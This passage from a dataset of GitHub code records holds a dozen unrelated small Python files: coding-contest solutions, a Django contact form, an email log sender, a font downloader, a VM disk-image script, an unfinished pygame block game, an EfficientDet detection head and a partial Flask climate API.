    #assert_response_is_xapi_data(response)\n    #data = response.json()\n\n    #if data['status'] != 'success':\n    #    raise requests.RequestException(f\"[XAPI Error]: {data['message']} ({response.url})\")\n","repo_name":"mjlomeli/Xbox-SDK","sub_path":"src/xbox_sdk/lib/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"72108193167","text":"# link to the task\n# https://pl.spoj.com/problems/EUCGAME/\nimport sys, math\n\ndef nwd(a, b):\n    c = a % b\n    a = b\n    b = c\n    if b == 0:\n        return a\n    else:\n        return nwd(a, b)\n\nanswers = []\nnumberOfTests = int(sys.stdin.readline())\nfor i in range(numberOfTests):\n    tokens = sys.stdin.readline().split(' ')\n    a = int(tokens[0])\n    b = int(tokens[1])\n    answers.append(nwd(a, b)*2)\n\nfor answer in answers:\n    sys.stdout.write(str(answer) + '\\n')","repo_name":"GredziszewskiK/spoj","sub_path":"EUCGAME.py","file_name":"EUCGAME.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"8860070885","text":"from django.conf import settings\nfrom django import forms\nfrom django.core.mail import send_mail, get_connection\n\nclass ContactForm(forms.Form):\n    sender = forms.EmailField(label=\"\", widget=forms.TextInput(attrs={ \"id\":\"email_sender\", \"placeholder\": \"Email...\" }))\n    cc_myself = forms.BooleanField(required=False, widget=forms.CheckboxInput(attrs={ \"id\":\"email_cc\" }))\n    subject = forms.CharField(label=\"\", max_length=100, widget=forms.TextInput(attrs={ \"id\":\"email_subject\", \"placeholder\": \"Subject...\" }))\n    message = forms.CharField(label=\"\", widget=forms.Textarea(attrs={ \"id\":\"email_message\", \"placeholder\": \"Your message...\" }))\n\n    def send_email(self):\n        recipients = [\"nadkarsushant@gmail.com\"]\n        if self.cleaned_data[\"cc_myself\"]:\n            recipients.append(self.cleaned_data[\"sender\"])\n\n
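        # in DEBUG, route mail through Django's console backend so nothing is\n        # sent via a real SMTP server\n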
        if settings.DEBUG:\n            con = get_connection('django.core.mail.backends.console.EmailBackend')\n        else:\n            con = None\n\n        send_mail(\n            self.cleaned_data[\"subject\"],\n            self.cleaned_data[\"message\"],\n            self.cleaned_data[\"sender\"],\n            recipients,\n            fail_silently=True,\n            connection=con,\n        )","repo_name":"sushantnadkar/django-personal-website","sub_path":"djangosite/portfolio/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"70854410446","text":"import sys\n\nsys.stdin = open(\"_반반.txt\")\n\nT = int(input())\n\nfor t in range(1, T + 1):\n    S = input()\n\n    al_cnt = {}\n\n    for s in S:\n        if s in al_cnt:\n            al_cnt[s] += 1\n        else:\n            al_cnt[s] = 1\n    \n    # the answer is Yes when exactly two keys\n    # in al_cnt have the value 2, otherwise No\n    result = []\n    for key, value in al_cnt.items():\n        if value == 2:\n            result.append(key)\n\n    if len(result) == 2:\n        print(f'#{t} Yes')\n    else:\n        print(f'#{t} No')","repo_name":"jejoonlee/TIL-and-Coding-Test","sub_path":"모의고사/20220812/0_반반.py","file_name":"0_반반.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"ko","doc_type":"code","stars":9,"dataset":"github-code","pt":"65"} +{"seq_id":"34405779556","text":"#!/bin/python3\n\nfrom email.message import EmailMessage\nimport smtplib\nimport ssl\nfrom datetime import datetime\nfrom time import strftime\nimport read_configuration\nimport gestion_log\n\n\ndef mail_send(reussi=True, objet=read_configuration.objet_reussi):\n    \"\"\"Sends the email\"\"\"\n    mail = EmailMessage()\n    mail['From'] = read_configuration.email\n    mail['To'] = read_configuration.destinataires\n    mail['Subject'] = objet\n\n    if read_configuration.bool_log:\n        gestion_log.Ecrire_rapport(\"Creating the attachment\")\n    body = 'Hello,\\nYou will find the log report attached.\\n\\nThis is an automated message.'\n    mail.set_content(body)\n    now = datetime.now()\n    f = \"logs/\"+now.strftime(\"%Y-%m-%d\")+\".log\"\n\n    mail.add_attachment(open(f, 'rb').read(), 'text', 'plain',\n                        filename='Rapport.log')\n\n    gestion_log.Ecrire_rapport(\"Sending the email\")\n    context = ssl.create_default_context()\n    with smtplib.SMTP_SSL(read_configuration.serveur_smtp, read_configuration.port_smtp, context=context) as smtp:\n        smtp.login(read_configuration.email, read_configuration.key)\n        smtp.sendmail(mail['From'], mail[\"To\"].split(\",\"), mail.as_string())\n        smtp.close()\n    return\n","repo_name":"Mohamed-elg/Archive","sub_path":"Main/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"24305526338","text":"def solution(N, number):\n    ans = dfs(N, number, 0, 0)\n\n    if ans <= 8:\n        return ans\n    else:\n        return -1\n\n\ndef dfs(n, number, curr, depth):\n    if depth > 8 or (curr == 0 and depth > 0):\n        return 987654321\n    if curr == number:\n        return depth\n\n    next_n, next_depth = 0, depth\n    ans = 987654321\n    for i in range(8 - depth):\n        next_n = next_n * 10 + n\n        next_depth += 1\n        ans = min(ans,\n                  dfs(n, number, curr + next_n, next_depth),\n                  dfs(n, number, curr - next_n, next_depth),\n                  dfs(n, number, curr * next_n, next_depth),\n                  dfs(n, number, curr // next_n, next_depth))\n    return ans\n\n\nprint(solution(5, 12))\nprint(solution(2, 11))\n\n\n# N + N\n# N - N\n# N * N\n# N / N\n# N * 10 + N\n","repo_name":"cjswo672/Algorithm_python","sub_path":"prev/programmers/level3/N으로_표현.py","file_name":"N으로_표현.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"42391536754","text":"import asyncio\n\nimport aiohttp\n\nfrom youwol_utils import parse_json\n\nasync def execute():\n\n    session = aiohttp.ClientSession()\n    file = parse_json(\"./fonts.json\")\n    for font in file['fonts']:\n        print(font['font-family'])\n        url = f\"https://tikzjax.com/bakoma/ttf/{font['font-family']}.ttf\"\n        async with await session.get(url=url) as resp:\n            if resp.status == 200:\n                out_file = open(f\"./dist/ttf/{font['font-family']}.ttf\", 'wb')\n                out_file.write(await resp.read())\n                out_file.close()\n    await session.close()\n\n\n
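# asyncio.run() creates, runs and closes its own event loop (Python 3.7+)\n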
asyncio.run(execute())\n","repo_name":"youwol/cdn-externals","sub_path":"tikzjax/1.0.0/fetch_fonts.py","file_name":"fetch_fonts.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"36358423577","text":"from atcoder.atcoder_test import def_input, input\n\ninput_text = \"\"\"\ncatredo\n\"\"\"\n\ndef_input(input_text)\n\nfrom collections import deque\n\nif __name__ == \"__main__\":\n    s = input()\n\n    mp = {}\n\n    queue = deque()\n    mp[s] = 0\n    queue.append(s)\n\n    while queue:\n        current = queue.popleft()\n        if current == \"atcoder\":\n            print(mp[current])\n            exit()\n\n        for i in range(1, 7):\n            next = list(current)\n            next[i - 1], next[i] = next[i], next[i - 1]\n            next = \"\".join(next)\n            if next not in mp:\n                queue.append(next)\n                mp[next] = mp[current] + 1\n","repo_name":"sinchir0/atcoder","sub_path":"220813_contest/4_ans.py","file_name":"4_ans.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"6040670979","text":"#!/usr/bin/python3\nimport os\nimport subprocess\nimport time\nimport sys\nimport math\n\nclass Timeout(Exception):\n\tpass\n\ndef run(command,timeout = 10):\n\tif isinstance(command,str):\n\t\tcommand = command.split()\n\tproc = subprocess.Popen(command,bufsize=0,stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n\tpoll_seconds = .1\n\tdeadline = time.time()+timeout\n\twhile time.time() < deadline and proc.poll()==None:\n\t\ttime.sleep(poll_seconds)\n\n\tif proc.poll()==None:\n\t\tproc.terminate()\n\t\traise Timeout()\n\n\tstdout,stderr = proc.communicate()\n\treturn stdout,stderr,proc.returncode\n\nstdout,stderr,status = run(\"VBoxManage list runningvms\")\nif \"zos\" in stdout.decode('u8'):\n\trun(\"VBoxManage controlvm zos poweroff\")\n\nfin = open(\"/home/zihao/osdev/boot.img\",'rb')\ndata = fin.read()\nfin.close()\nfout = open(\"/home/zihao/VirtualBox VMs/zos/zos-flat.vmdk\",'wb')\nlength = fout.write(data)\n\n
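# pad to a whole 512-byte sector, then append 512 KiB of zeros (presumably to\n# match the disk size declared in the flat VMDK's descriptor)\n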
if length%512 !=0:\n\tfout.write(b'\\x00'* (512-length%512))\nfout.write(b'\\x00' * (1024*512))\nfout.close()\n\nrun(\"VBoxManage startvm zos\")","repo_name":"zzh8829/ZOS","sub_path":"zos/old/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"74874680848","text":"import pygame\r\nimport random\r\nimport sys\r\n# Define some colors\r\nBLACK = (0, 0, 0)\r\nWHITE = (255, 255, 255)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLUE = (0, 0, 255)\r\nYELLOW = (255, 255, 0)\r\npygame.font.init()\r\nfont_path = r'C:\Users\jddoc\OneDrive\Desktop\Roboto-Regular.ttf'\r\n# Set the dimensions of the grid\r\nSCREEN_WIDTH = 40\r\nSCREEN_HEIGHT = 30\r\n\r\n# Set the size of each block in pixels\r\nBLOCK_SIZE = 30\r\n\r\n# Set the font for displaying the score and timer\r\nFONT_NAME = pygame.font.match_font('arial')\r\nSCORE_FONT = pygame.font.Font(font_path, 30)\r\nTIMER_FONT = pygame.font.Font(font_path, 30)\r\nGAME_OVER_FONT = pygame.font.Font(font_path, 30)\r\n\r\nNUM_ROWS = 8\r\nNUM_COLS = 10\r\nFPS = 60\r\nMAX_TIMER = 5\r\n\r\nclock = pygame.time.Clock()\r\nclock.tick(FPS)\r\nclass Block:\r\n    \"\"\"A single block in the grid.\"\"\"\r\n\r\n    def __init__(self, color):\r\n        self.color = color\r\n\r\n\r\nclass BlockGroup:\r\n    \"\"\"A group of four blocks that falls down the grid.\"\"\"\r\n\r\n    def __init__(self, blocks):\r\n        self.blocks = blocks\r\n    \r\n    @classmethod\r\n    def random(cls):\r\n        # NOTE: relies on class attributes block_shapes, block_colors and\r\n        # block_size that are not defined anywhere in this file\r\n        x = random.choice(range(6))\r\n        y = random.choice(range(6))\r\n        block_type = random.choice(list(cls.block_shapes.keys()))\r\n        block_color = random.choice(list(cls.block_colors.keys()))\r\n        blocks = []\r\n        for i in range(2):\r\n            for j in range(2):\r\n                if cls.block_shapes[block_type][i][j]:\r\n                    block = Block(cls.block_size, block_color)\r\n                    block.rect.x = (x + j) * cls.block_size\r\n                    block.rect.y = (y + i) * cls.block_size\r\n                    blocks.append(block)\r\n        return cls(blocks)\r\n\r\n    def __init__(self):\r\n        self.blocks = [\r\n            Block(random.choice([RED, GREEN, BLUE, YELLOW])),\r\n            Block(random.choice([RED, GREEN, BLUE, YELLOW])),\r\n            Block(random.choice([RED, GREEN, BLUE, YELLOW])),\r\n            Block(random.choice([RED, GREEN, BLUE, YELLOW])),\r\n        ]\r\n        self.x = 5\r\n        self.y = 0\r\n        self.rotation = 0\r\n\r\n    def rotate(self):\r\n        \"\"\"Rotate the block group.\"\"\"\r\n        self.rotation = (self.rotation + 1) % 4\r\n\r\n    def move_left(self):\r\n        \"\"\"Move the block group to the left.\"\"\"\r\n        self.x -= 1\r\n\r\n    def move_right(self):\r\n        \"\"\"Move the block group to the right.\"\"\"\r\n        self.x += 1\r\n\r\n    def move_down(self):\r\n        \"\"\"Move the block group down.\"\"\"\r\n        self.y += 1\r\n\r\n\r\nclass BlockGrid:\r\n    \"\"\"The grid that contains the blocks.\"\"\"\r\n\r\n    def __init__(self, rows, cols):\r\n        \"\"\"Initialize the grid with the specified number of rows and columns.\"\"\"\r\n        self.rows = rows\r\n        self.cols = cols\r\n        self.grid = [[None for _ in range(cols)] for _ in range(rows)]\r\n        self.current_block = None\r\n        self.score = 0\r\n        self.timer = clock.tick(FPS)\r\n        self.game_over = False\r\n        self.screen = pygame.display.set_mode((SCREEN_WIDTH * BLOCK_SIZE, SCREEN_HEIGHT * BLOCK_SIZE))\r\n        self.cursor = None\r\n        self.num_cleared_blocks = 0\r\n        self.blocks = []\r\n\r\n    def has_block_over_red_line(self):\r\n        for block in self.blocks:\r\n            if block.y <= RED_LINE_Y:\r\n                return True\r\n        return False\r\n\r\n    def create_falling_block(self):\r\n        \"\"\"Create a new falling block.\"\"\"\r\n        self.current_block = BlockGroup.random()\r\n        if self.current_block != None:\r\n            self.current_block.move(self.cols // 2 - 1, 0)\r\n\r\n    def update(self):\r\n        \"\"\"Update the game state.\"\"\"\r\n        if self.current_block is None:\r\n            self.create_falling_block()\r\n\r\n        # Check if the current block can move down\r\n        if self.current_block != None:\r\n            if self.current_block.can_move(0, 1):\r\n                self.current_block.move(0, 1)\r\n            else:\r\n                # The block can't move down, so add it to the grid and create a new falling block\r\n                self.current_block.add_to_grid(self.grid)\r\n                cleared = self.clear_groups()\r\n                self.score += 30 + 10 * (len(cleared) - 1)\r\n                self.current_block = None\r\n\r\n        # Check if any blocks are above the red line\r\n        for col in range(self.cols):\r\n            if self.grid[0][col] is not None:\r\n                self.timer.count_down()\r\n                self.game_over = True\r\n                return\r\n\r\n\r\n\r\n    def clear_groups(self):\r\n        \"\"\"Clear all groups of three or more blocks and return the list of cleared blocks.\"\"\"\r\n        groups = self.get_groups()\r\n        for group in groups:\r\n            for block in group:\r\n                block.remove_from_grid(self.grid)\r\n        return [block for group in groups for block in group]\r\n\r\n    def get_groups(self):\r\n        \"\"\"Return a list of all groups of three or more adjacent blocks of the same color.\"\"\"\r\n        groups = []\r\n        visited = set()\r\n\r\n        for row in range(self.rows):\r\n            for col in range(self.cols):\r\n                block = 
self.grid[row][col]\r\n if block is not None and block not in visited:\r\n group = self.get_group(block)\r\n if len(group) >= 3:\r\n groups.append(group)\r\n visited.update(group)\r\n\r\n return groups\r\n\r\n def get_group(self, block):\r\n \"\"\"Return the group of adjacent blocks of the same color as the specified block.\"\"\"\r\n color = block.color\r\n visited = {block}\r\n queue = [block]\r\n\r\n while queue:\r\n block = queue.pop(0)\r\n for neighbor in block.get_neighbors(self.grid):\r\n if neighbor not in visited and neighbor.color == color:\r\n visited.add(neighbor)\r\n queue.append(neighbor)\r\n\r\n return visited\r\n\r\n def handle_input(self, key):\r\n \"\"\"Handle user input.\"\"\"\r\n if key == \"left\" and self.current_block.can_move(-1, 0):\r\n self.current_block.move(-1, 0)\r\n elif key == \"right\" and self.current_block.can_move(1, 0):\r\n self.current_block.move(1, 0)\r\n elif key == \"down\" and self.current_block.can_move(0, 1):\r\n self.current_block.move(0, 1)\r\n elif key == \"rotate\":\r\n self.current_block.rotate()\r\n\r\n def draw(self, screen):\r\n \"\"\"Draw the grid on the specified screen.\"\"\"\r\n screen.fill((255, 255, 255))\r\n\r\n # Draw the blocks in the grid\r\n for row in range(self.rows):\r\n for col in range(self.cols):\r\n block = self.grid[row][col]\r\n if block is not None:\r\n rect = pygame.Rect(col * BLOCK_SIZE, row * BLOCK_SIZE, BLOCK_SIZE, BLOCK_SIZE)\r\n pygame.draw.rect(screen, block.color, rect)\r\n\r\n # Draw the falling block\r\n if self.current_block is not None:\r\n for block in self.current_block.blocks:\r\n row, col = block.row + self.current_block.row, block.col + self.current_block.col\r\n rect = pygame.Rect(col * BLOCK_SIZE, row * BLOCK_SIZE, BLOCK_SIZE, BLOCK_SIZE)\r\n pygame.draw.rect(screen, block.color, rect)\r\n\r\n # Draw the cursor\r\n if self.cursor is not None:\r\n rect = pygame.Rect(self.cursor.col * BLOCK_SIZE, self.cursor.row * BLOCK_SIZE, BLOCK_SIZE, BLOCK_SIZE)\r\n pygame.draw.rect(screen, (255, 0, 0), rect, 2)\r\n\r\n # Draw the score\r\n score_text = SCORE_FONT.render(f\"Score: {self.score}\", True, (0, 0, 0))\r\n screen.blit(score_text, (10, 10))\r\n\r\n # Draw the timer\r\n timer_text = TIMER_FONT.render(f\"Time left: {self.timer // FPS}\", True, (0, 0, 0))\r\n screen.blit(timer_text, (10, 50))\r\n\r\n # Draw the game over screen\r\n if self.game_over:\r\n game_over_text = GAME_OVER_FONT.render(\"Game Over\", True, (255, 0, 0))\r\n screen.blit(game_over_text, (SCREEN_WIDTH // 2 - game_over_text.get_width() // 2, SCREEN_HEIGHT // 2 - game_over_text.get_height() // 2))\r\n\r\n pygame.display.flip()\r\n\r\n def handle_input(self):\r\n \"\"\"Handle user input.\"\"\"\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n sys.exit()\r\n elif event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT:\r\n self.cursor.col -= 1\r\n elif event.key == pygame.K_RIGHT:\r\n self.cursor.col += 1\r\n elif event.key == pygame.K_UP:\r\n self.rotate_cursor()\r\n elif event.key == pygame.K_DOWN:\r\n self.drop_falling_block()\r\n\r\n def rotate_cursor(self):\r\n \"\"\"Rotate the block that the cursor is pointing to.\"\"\"\r\n row, col = self.cursor.row, self.cursor.col\r\n if self.grid[row][col] is not None:\r\n self.grid[row][col].rotate()\r\n\r\n def drop_falling_block(self):\r\n \"\"\"Drop the falling block into the grid.\"\"\"\r\n if self.falling_block is None:\r\n return\r\n\r\n # Add the falling block to the grid\r\n for block in self.falling_block.blocks:\r\n row, col = block.row + 
self.falling_block.row, block.col + self.falling_block.col\r\n if row < 0:\r\n self.game_over = True\r\n return\r\n self.grid[row][col] = block\r\n\r\n # Check for completed groups\r\n self.check_groups()\r\n\r\n # Reset the falling block and generate a new one\r\n self.falling_block = None\r\n self.generate_falling_block()\r\n\r\n def check_groups(self):\r\n \"\"\"Check for completed groups and remove them.\"\"\"\r\n for row in range(self.rows):\r\n for col in range(self.cols):\r\n block = self.grid[row][col]\r\n if block is not None:\r\n # Check for a group of 3 blocks with the same color\r\n if self.get_block(row - 1, col) == block and self.get_block(row - 2, col) == block:\r\n # Remove the group of 3 blocks\r\n self.remove_block(row, col)\r\n self.remove_block(row - 1, col)\r\n self.remove_block(row - 2, col)\r\n self.score += 30\r\n # Check for additional blocks that can be removed as a result of this removal\r\n self.check_groups()\r\n elif self.get_block(row, col - 1) == block and self.get_block(row, col - 2) == block:\r\n # Remove the group of 3 blocks\r\n self.remove_block(row, col)\r\n self.remove_block(row, col - 1)\r\n self.remove_block(row, col - 2)\r\n self.score += 30\r\n # Check for additional blocks that can be removed as a result of this removal\r\n self.check_groups()\r\n elif self.get_block(row - 1, col - 1) == block and self.get_block(row - 2, col - 2) == block:\r\n # Remove the group of 3 blocks\r\n self.remove_block(row, col)\r\n self.remove_block(row - 1, col - 1)\r\n self.remove_block(row - 2, col - 2)\r\n self.score += 30\r\n # Check for additional blocks that can be removed as a result of this removal\r\n self.check_groups()\r\n elif self.get_block(row - 1, col + 1) == block and self.get_block(row - 2, col + 2) == block:\r\n # Remove the group of 3 blocks\r\n self.remove_block(row, col)\r\n self.remove_block(row - 1, col + 1)\r\n self.remove_block(row - 2, col + 2)\r\n self.score += 30\r\n # Check for additional blocks that can be removed as a result of this removal\r\n self.check_groups()\r\n\r\n # Update the display\r\n self.draw(self.screen)\r\n pygame.display.flip()\r\n\r\ndef run_game():\r\n # Initialize the game\r\n pygame.init()\r\n screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\r\n pygame.display.set_caption(\"Block Game\")\r\n clock = pygame.time.Clock()\r\n font = pygame.font.SysFont(None, 30)\r\n matrixImg = pygame.image.load('Screen Shot 2023-03-09 at 5.21.07 PM.png')\r\n screen.blit(matrixImg, (400, 300))\r\n\r\n # Create the block grid\r\n block_grid = BlockGrid(NUM_ROWS, NUM_COLS)\r\n\r\n # Initialize game variables\r\n score = 0\r\n timer = MAX_TIMER\r\n game_over = False\r\n\r\n # Game loop\r\n while not game_over:\r\n # Handle events\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n game_over = True\r\n elif event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT:\r\n block_grid.move_left()\r\n elif event.key == pygame.K_RIGHT:\r\n block_grid.move_right()\r\n elif event.key == pygame.K_UP:\r\n block_grid.rotate_clockwise()\r\n elif event.key == pygame.K_DOWN:\r\n block_grid.rotate_counter_clockwise()\r\n\r\n # Update the game state\r\n block_grid.update()\r\n block_grid.check_groups()\r\n screen.blit(matrixImg, (400, 300))\r\n\r\n # Update the score\r\n num_cleared_blocks = block_grid.num_cleared_blocks\r\n if num_cleared_blocks > 0:\r\n score += 30 + 10 * (num_cleared_blocks - 1)\r\n\r\n # Update the timer\r\n if block_grid.has_block_over_red_line():\r\n timer -= 1\r\n else:\r\n timer = 
MAX_TIMER\r\n\r\n # Check if the game is over\r\n if timer <= 0:\r\n game_over = True\r\n\r\n # Draw the game\r\n block_grid.draw(screen)\r\n score_text = font.render(f\"Score: {score}\", True, (0, 0, 0))\r\n screen.blit(score_text, (10, 10))\r\n timer_text = font.render(f\"Timer: {timer}\", True, (0, 0, 0))\r\n screen.blit(timer_text, (SCREEN_WIDTH - timer_text.get_width() - 10, 10))\r\n pygame.display.flip()\r\n\r\n # Wait for the next frame\r\n clock.tick(FPS)\r\n\r\n # Game over\r\n game_over_text = font.render(\"Game Over\", True, (255, 0, 0))\r\n screen.blit(game_over_text, (SCREEN_WIDTH // 2 - game_over_text.get_width() // 2, SCREEN_HEIGHT // 2 - game_over_text.get_height() // 2))\r\n pygame.display.flip()\r\n pygame.time.wait(2000)\r\n\r\n pygame.quit()\r\n\r\nimport random\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n run_game()\r\n","repo_name":"JadeFezon/things","sub_path":"TSAGame (2).py","file_name":"TSAGame (2).py","file_ext":"py","file_size_in_byte":14743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"69887993489","text":"# -*- coding:utf-8 -*-\n# Author: huashuoshuo\n# Data: 2019/12/18 16:37\n\nimport torch\nimport torch.nn as nn\nfrom model.BiFPN import ConvBlock\nimport model.losses as losses\nfrom model.efficientdet import EfficientDet\nfrom pycocotools.coco import COCO as COCO\nfrom model.anchors import Anchors\n# from lib.nms.pth_nms import pth_nms\nimport torchvision.ops as ops\nfrom model.util import BasicBlock, Bottleneck, BBoxTransform, ClipBoxes, Filter_boxes\ndef nms(bbox, score, thresh):\n # bbox, score = dets\n return ops.nms(boxes=bbox, scores=score, iou_threshold=thresh)\n # return pth_nms(dets, thresh)\n\n\nclass Reg(nn.Module):\n \"\"\"\n\n \"\"\"\n def __init__(self, inp, oup, depth, num_anchor):\n super().__init__()\n self.inp = inp\n self.oup = oup\n self.D = depth\n self.reg = nn.ModuleList()\n self.num_anchors = num_anchor\n\n for i in range(self.D):\n self.reg.append(ConvBlock(inp=self.inp, oup=self.oup, k_size=3, stride=1, padding=1))\n # self.retina_cls = nn.Conv2d(self.oup, self.num_anchors * self.num_class, 3, padding=1)\n self.retina_reg = nn.Conv2d(self.oup, self.num_anchors * 4, 3, padding=1)\n def forward(self, x):\n reg = x\n for conv in self.reg:\n reg = conv(reg)\n\n reg = self.retina_reg(reg)\n\n reg = reg.permute(0, 2, 3, 1)\n return reg.contiguous().view(reg.shape[0], -1, 4)\n\nclass Cls(nn.Module):\n \"\"\"\n\n \"\"\"\n def __init__(self, inp, oup, depth, num_anchor, num_class):\n super().__init__()\n self.inp = inp\n self.oup = oup\n self.D = depth\n self.cls = nn.ModuleList()\n self.num_anchors = num_anchor\n self.num_class = num_class\n for i in range(self.D):\n self.cls.append(ConvBlock(inp=self.inp, oup=self.oup, k_size=3, stride=1, padding=1))\n self.retina_cls = nn.Conv2d(self.oup, self.num_anchors * self.num_class, 3, padding=1)\n self.act = nn.Sigmoid()\n def forward(self, x):\n cls = x\n for conv in self.cls:\n cls = conv(cls)\n cls = self.retina_cls(cls)\n cls = self.act(cls)\n\n cls = cls.permute(0, 2, 3, 1)\n\n batch_size, width, height, channel = cls.shape\n\n out = cls.view(batch_size, width, height, self.num_anchors, self.num_class)\n return out.contiguous().view(cls.shape[0], -1, self.num_class)\n\n\nclass RetinaHead(nn.Module):\n \"\"\"\n\n \"\"\"\n def __init__(self, parser, num_classes=80, num_anchor=9, is_demo=False):\n super().__init__()\n depth = 3\n inp = oup = 64\n\n self.regression = Reg(inp, oup, depth-1, num_anchor)\n self.classification = 
Cls(inp, oup, depth-1, num_anchor, num_classes)\n self.FocalLoss = losses.FocalLoss()\n self.anchors = Anchors()\n self.EfficientDet = EfficientDet(parser)\n self.regressBoxes = BBoxTransform()\n self.is_demo = is_demo\n self.clipBoxes = ClipBoxes()\n def forward(self, inputs):\n if self.training:\n img_batch, annotations = inputs\n else:\n img_batch = inputs\n\n features = self.EfficientDet(img_batch)\n regression = torch.cat([self.regression(feature) for feature in features], dim=1)\n classification = torch.cat([self.classification(feature) for feature in features], dim=1)\n anchors = self.anchors(img_batch)\n\n # self.FocalLoss(classification, regression, anchors, annotations)\n if self.training:\n return self.FocalLoss(classification, regression, anchors, annotations)\n else:\n transformed_anchors = self.regressBoxes(anchors, regression)\n transformed_anchors = self.clipBoxes(transformed_anchors, img_batch)\n\n scores = torch.max(classification, dim=2, keepdim=True)[0]\n\n if self.is_demo:\n return transformed_anchors, classification, scores\n\n scores_over_thresh = (scores>0.01)[0, :, 0]\n\n if scores_over_thresh.sum() == 0:\n # no boxes to NMS, just return\n return [torch.zeros(0).cuda(), torch.zeros(0).cuda(), torch.zeros(0, 4).cuda()]\n\n classification = classification[:, scores_over_thresh, :]\n transformed_anchors = transformed_anchors[:, scores_over_thresh, :]\n scores = scores[:, scores_over_thresh, :]\n # print(transformed_anchors.shape, scores.shape)\n\n # anchors_nms_idx = nms(torch.cat([transformed_anchors, scores], dim=2)[0, :, :], 0.5)\n # print(transformed_anchors[0, :, :])\n anchors_nms_idx = nms(transformed_anchors[0, :, :], scores[0, :, 0], 0.45)\n nms_scores, nms_class = classification[0, anchors_nms_idx, :].max(dim=1)\n\n return [nms_scores, nms_class, transformed_anchors[0, anchors_nms_idx, :]]\n\n\n\n\n\n\n","repo_name":"coderhss/efficientdet-pytorch","sub_path":"model/RetinaHead.py","file_name":"RetinaHead.py","file_ext":"py","file_size_in_byte":4834,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"65"} +{"seq_id":"37521805685","text":"#!/usr/bin/env python\nimport os\nimport subprocess\n#output = subprocess.check_output(\"cat /etc/services\", shell=True)\n\noutput = subprocess.check_output(\"upower -i /org/freedesktop/UPower/devices/battery_BAT0 | awk '/percentage/ {print $2}'\",shell=True)\ncharging = subprocess.check_output(\"upower -i /org/freedesktop/UPower/devices/battery_BAT0 | awk '/discharging/ {print $2}'\",shell=True)\nfilename = \"/home/nick/Documents/.battery\"\n\n \n\n\nlevel = int(output[:-2])\nlow = False\nlimit = 60\nhigh = 80\nlow = 25\n\nif(\"discharging\" not in charging):\n print(\"/home/nick/Pictures/icons/battery_charging.svg\")\nelse:\n if(level >= high):\n print(\"/home/nick/Pictures/icons/battery_good.svg\")\n elif((level < high) and (level >= low)):\n print(\"/home/nick/Pictures/icons/battery_medium.svg\")\n else:\n print(\"/home/nick/Pictures/icons/battery_low.svg\")\n\nif(level < 75 and \"discharging\" in charging):\n if not os.path.exists(filename):\n print(\"?\")\n subprocess.call(\"notify-send\",shell = True)\n file = open(filename,\"w\")\n file.write(\"t\")\n file.close()\n\n \n#print(charging)\nprint(str(level) + \"%\")\n","repo_name":"lorem-ipsumm/dotfiles","sub_path":"battery.py","file_name":"battery.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"39518151452","text":"# 
import dependencies\nimport datetime as dt\nimport numpy as np\nimport pandas as pd\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\nfrom flask import Flask, jsonify\n\n# Setup/Access SQLite Database\nengine = create_engine(\"sqlite:///hawaii.sqlite\")\n\n# Reflect database into the classes\nBase = automap_base()\n\nBase.prepare(engine, reflect=True)\n\n# Save our references to each table\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n\n# Create a session link from Python to the database\nsession = Session(engine)\n\n# create/define a new Flask app instance\napp = Flask(__name__)\n\n# create flask routes\n@app.route('/')\n# Welcome route\ndef welcome():\n    return(\n        f\"Welcome to the Climate Analysis API!<br/>\"\n        f\"Available Routes:<br/>\"\n        f\"/api/v1.0/precipitation<br/>\"\n        f\"/api/v1.0/stations<br/>\"\n        f\"/api/v1.0/tobs<br/>\"\n        f\"/api/v1.0/temp/start/end<br/>\")\n\n# Precipitation route\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n    prev_year = dt.date(2017, 8, 23) - dt.timedelta(days=365)\n    precipitation = session.query(Measurement.date, Measurement.prcp).filter(Measurement.date >= prev_year).all()\n    precip = {date: prcp for date, prcp in precipitation}\n    return jsonify(precip)\n\n# Stations Route\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n    results = session.query(Station.station).all()\n    stations = list(np.ravel(results))\n    return jsonify(stations=stations)\n\n# Temperature Observations for previous year route\n@app.route(\"/api/v1.0/tobs\")\ndef temp_monthly():\n    # date from one year ago\n    prev_year = dt.date(2017, 8, 23) - dt.timedelta(days=365)\n    # 